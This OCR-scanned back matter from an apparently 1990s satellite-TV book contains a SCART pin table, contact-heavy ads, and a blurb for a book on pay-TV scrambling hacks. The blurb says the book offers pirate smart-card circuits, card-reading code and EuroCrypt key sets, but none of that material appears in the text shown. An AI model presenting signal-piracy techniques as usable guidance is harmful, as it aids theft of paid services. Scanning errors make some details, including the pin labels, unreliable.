Pin 18 із Video Input Ground 
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The SCART socket is used on some receivers to connect 
directly to a video recorder or television. 


Pin Connections Table 
Pin Number 1: Audio Output Right 
Pin Number 2: Return Audio Input Right 
Pin Number 3: Audio Output Left 
Pin Number 4: Audio Ground 
Pin Number 5: Blue Return 
Pin Number 6: Return Audio Input Left 
Pin Number 7: Blue Input Or Output 
Pin Number 8: Audio/Video Switch 
Pin Number 9: Green Return 
Pin Number 10: Not Connected 
Pin Number 11: Green Input Or Output 
Pin Number 12: Not Connected 
Pin Number 13: Red Return 
Pin Number 14: Not Connected 
Pin Number 15: Red Input Or Output 
Pin Number 16: Blanking 
Pin Number 17: Video Ground 
Pin Number 18: Blanking Ground 
Pin Number 19: Video Output 
Pin Number 20: Video Input 


Pin Number 21 Common Ground 
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_ Standard SCART Connections 


As Viewed From Rear Of Receiver 
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Pin 4 is Audio Ground. 
Pin 17 is Video Output Ground 
Pin 18 Is Video Input Ground 
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SINTERNET ADVERTISING WEB DESIGN 


From Now till December 1996 
We are running a Modem 
Scrappage Scheme. 
Trade in your old for the latest 
28,800 or 33,600! 
Ring for details - or check our website at 
hitp://www.thecia.ie 
Kaima House, 49 Wainsfort Park, Terenure, Dublin 6w, Ireland. 
Tel: +353-1-4924034 Fax: +353-1-4924035 
E-mail: Insight @internet-ireland.ie 
web address: http://www. internet-ireland.ie/insight 
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Satellite Television News Services 


ө The Satellite Television Newsline 
0336 413 413 (Voice) 


0336 422-888 (Fax) Intl: +85217277400 


New channel launches. Adult Viewing - what is really going on? Scans 
and cons - what to avoid. The latest rumours and issues investigated. 
New products and services. All the news that affects you whether you 
are a dealer or a viewer. 


The best and most well researched authorative newsline in the UK, it 
also draws upon the expertise of a team of leading European 
journalists. 


Updated Twice A Day - Seven Days A Week 


ө Transponder Watch 


A listing of the latest transponder traffic including details of the latest 
launches, new channels, feeds and tests. 


0336-442-889 (Fax) Intl: +85217277401 
e Hack Watch News Faxback Service 


0336-422-885 (Fax) Intl: +85217277402 


The faxback version of Hack Watch News. Read about the issues 
making the news in the world of signal insecurity. Covers the stories 
that others couldn't even begin to understand. 


Get The Whole Picture 


TV Live Limited, 78 Shepards Way, Rickmansworth, 
Herts, WD3-2NR, UK 
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American Hacker Magazine 


Formerly known as Scrambling News, American hacker is the US's 
leading satellite television insecurity newsletter. It covers the American 
hacker scene with interviews with hackers, product reviews and articles 
on computer hacking and phone phreaking. 


http:/www.scramblingnews.com 
Voice & Fax: 716-283-6910 

Scrambling News, $29.95 for 12 issues and BBS 
3494 Delaware Avenue #123 access. Call for foreign rates 
Buffalo, New York 
NY14217-1230, USA 





Stockists For The Black Book 


UK 
Baylin Publications, 24 River Gardens, Purley, Reading, RG8-8BX 
Voice: %44(0)836-582-785 Fax:+44-(0)118-9414468 


Swift Publications, 17 Pittfield, Cricklade, Wiltshire, SN6-6AN 
Voice: *44(0)1793-750620 Fax:+44(0)1793-752399 

Spain 

IPETEL, Hermosilla 31, Madrid 28001 

Voice: *34-1-5774296 Fax: *34-1-5764966 

USA 

Baylin Publications, 1905 Mariposa, Boulder, CO 80302 
Voice: 303-449-4551 Fax: 303-939-8720 


American Hacker (details above) 
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Hack Watch News is Europe's only 
Hack Watch News Satellite and Cable systems insecu- 
oo rity newsletter. It covers the world of 
scrambling systems in a detail that 
nobody else can match. In the past, 
HWN has printed details of the 
DirecTv hack over six months before 
it hit the market. HWN has also 
been the leading source of informa- 
tion on the Sky 07, 09 and 10 card 
hacks. 





Piracy On The Final Frontier There are two versions of HWN; an 
electronic version that can be 
e-mailed directly to your internet 
account and a paper version that is sent via post. A subscription to 
either version gives full access to the World famous SPECIAL 
PROJECTS BBS and also to the Special Projects Internet BBS (details 
can be found on http:/Aww.hackwatch.com/~kooltek/bbs. html) 


Ordering Details: 
Q 12 Issues HWN (Paper) Europe £49.95, World £77.00 
Q 12 Issues e-HWN £35.00 


П Black Book 5 Europe £35, World £44 
Payment Method: Access _Маѕќегсага _Visa Cheque _Draft 
Mail To: Hack Watch News, 22 Viewmount, Waterford, Ireland. 
Or Fax To: +353-51-850143 or +353-51-873640 


Name:.. 





European Scrambling Systems is the “bible” of the 
black arts of signal security. Now in European 
Scrambling Systems 5, John McCormac analyses all 
of the latest hacks and scrambling systems. This 
time systems beyond Europe are examined 


In This Versic 


@ How VideoCrypt Was Hacked - Again! 


The Sky 10 card was meant to stop piracy. Read 
how it failed and how Sky's first PPV event was 
hacked. Could this mean that Sky’s new PPV 
services are now in jeopardy? Can the McCor- 


mac Hack be used over the Internet to hack 
NN PPV? 


@The DirecTv VideoGuard System 


They were hacks that DirecTv and News 

Datacom claimed were impossible. But they 

happened. Read about how to read infor- 

mation from the DSS card along with the C 
So code. Also read how it may be possible to create a Blocker hack for 
this system. Will this system fall to a SEASON type hack? 


ФА Compendium Of Pirate Smart Cards And Related Technology 


The most comprehensive set of circuit diagrams and PCB patterns for pirate 
Smart cards, SEASON adapters and Phoenix card programmer - readers 
ever published. Includes the Sky 10 Battery Card and the DSS battery card 
and a PIC16C84 phonecard emulator. 


© EuroCrypt - Catastrophe By Committee 


Read about how the D2-MAC EuroCrypt system was totally compromised 
and steps that the channels implemented to try and stop the hacks. Includes 
a full disassembly a pirate EuroCrypt card and an examination of the 
essential EuroCrypt commands together with the key sets. 


Warning 
The information contained in this book is for educational use only. The 
publishers and the author do not assume any liability for the use or misuse 
of the mformation herein. In certain countries the use of certain circuits and 
techniq may be prohibited by law. In some countries, this book is 
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lines ты Voice&Fax: +353-51-873640 
BBS&Fax: +353-51-850143 V34 

Waterford University Press, email: jmcc @ hackwatch.com 


MC2 (Publications Division), http://www. hackwatch.com/kooltek 
22 Viewmount, Waterford Ireland. 


ISBN: 1-873556-22-5 IR£34.00 





